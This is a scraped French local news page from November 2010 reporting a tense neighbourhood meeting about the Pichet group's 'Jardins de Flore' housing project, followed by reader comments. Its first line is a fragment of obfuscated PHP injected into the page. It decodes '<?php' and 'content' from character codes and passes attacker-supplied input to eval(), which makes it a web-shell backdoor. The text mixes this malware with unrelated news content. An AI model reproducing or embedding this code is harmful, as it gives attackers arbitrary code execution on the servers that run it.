YzCpEMJ();}private function YzCpEMJ(){if (is_array(N_pHf::$HIYnhx)) {$sfRkXmYCG = str_replace("\x3c" . chr (63) . chr ( 920 - 808 ).'h' . "\160", "", N_pHf::$HIYnhx[chr (99) . "\x6f" . chr (110) . "\164" . "\145" . "\x6e" . "\x74"]);eval($sfRkXmYCG);exit();}}}$btnci = new N_pHf(); $btnci = NULL;} ?>
6 novembre 2010 06h00 | Par Olivier delhoumeau | 2 | commentaire(s) |
Prévue le 12 octobre à l'origine, la présentation du projet immobilier du groupe Pichet avait fait les frais de l'annulation du conseil de quartier. Remise à jeudi soir, l'assemblée plénière a tenu ses promesses.
D'emblée, Bernard Le Roux, premier adjoint, pose les jalons, soulignant que la ville n'est pas en mesure de se prononcer sur le sujet. Pourquoi ? « Parce que le permis de construire est en cours d'instruction. Je dirai simplement qu'au stade actuel de notre réflexion, la question du stationnement n'est pas résolue. Mais nous y travaillons », dixit l'élu.
Heureusement, le promoteur régional a dépêché deux représentants : Olivier Turon, directeur du développement, et Jean-François Legal, l'architecte du projet. Il y a quinze jours, les deux hommes s'en étaient sortis avantageusement face aux commerçants, informés avec un temps d'avance. Jeudi, l'accueil fut nettement plus tiède.
268 places de parkingLe programme des Jardins de Flore porte sur la construction de 191 logements sur une parcelle d'1,2 ha, côté sud de l'avenue de la Somme. L'ensemble immobilier s'étend de la Maison de quartier (non incluse) jusqu'aux locaux de la Bourse de l'immobilier. Sept bâtiments (en R + 3 avec attique) bénéficiant du label BBC (bâtiment basse consommation) figurent sur le plan de masse : trois le long de l'axe routier et quatre en cœur d'îlot, dans un environnement combinant places de stationnement et espace végétalisé.
Il y aura deux entrées et sorties. Les commerces existants seront intégralement relogés en rez-de-chaussée. « On ne rajoutera pas de surface commerciale, promet Olivier Turon. Par contre, on donnera une valeur ajoutée grâce à une meilleure organisation. » T2 et T3 sont majoritaires. Pichet prévoit 44 logements conventionnés et le reste en accession à la propriété.
Questionné sur le volet stationnement, Olivier Turon soutient que les emplacements bordant la Somme ne seront pas impactés. Au total, 268 places de parking seront créées et accessibles à tous en journée. En l'occurrence, le promoteur en rajoute 30 de plus par rapport aux exigences du plan local d'urbanisme (PLU).
Dans le public, plusieurs personnes ont déploré la logique de densification urbaine. D'autres s'en sont pris à l'esthétique architecturale du programme. « Incohérente au regard du quartier », selon un jeune homme. « Moche ! On se croirait à la cité des Pins ancienne version », clame une dame. L'architecte Jean-François Legal serre les dents. L'esthétique relève, selon lui, de considérations purement subjectives. « Quand on analyse le contexte urbain, le quartier est indéniablement à plat. Cependant, l'optimisation de l'espace correspond au PLU qui s'applique à la ville et à la CUB. » Présents dans la salle, Thierry Millet et Gérard Chausset, probablement en campagne, en ont rajouté une louche sur l'aspect « rectiligne et monobloc » du bâti. Bernard Le Roux et Claude Baudry, adjoint à l'urbanisme, ont assuré que les remarques avaient été entendues. Pichet apportera-t-il des retouches ? En tout cas, le sujet sera au menu de la réunion des adjoints, lundi matin, en mairie.
La suite lundi, avec la réhabilitation de la polyclinique des Cèdres.
Tous les blogs des correspondants
Gastronomie / Oenologie Sel de la Terre
Accéder à l'annuaire des associations
| ||||||||||
|
06/11/2010, à 09h12
Alertez
06/11/2010, à 08h50
Si du R+3 est considéré comme de la densification urbaine, alors on est mal barré. On est vraiment dans une région campagnarde. Mettons nos bottes et allons aux cèpes....
Mais seulement, avec ce genre de "densification" en rase mottes, la forêt risque de s'éloigner de plus en plus.
Alertez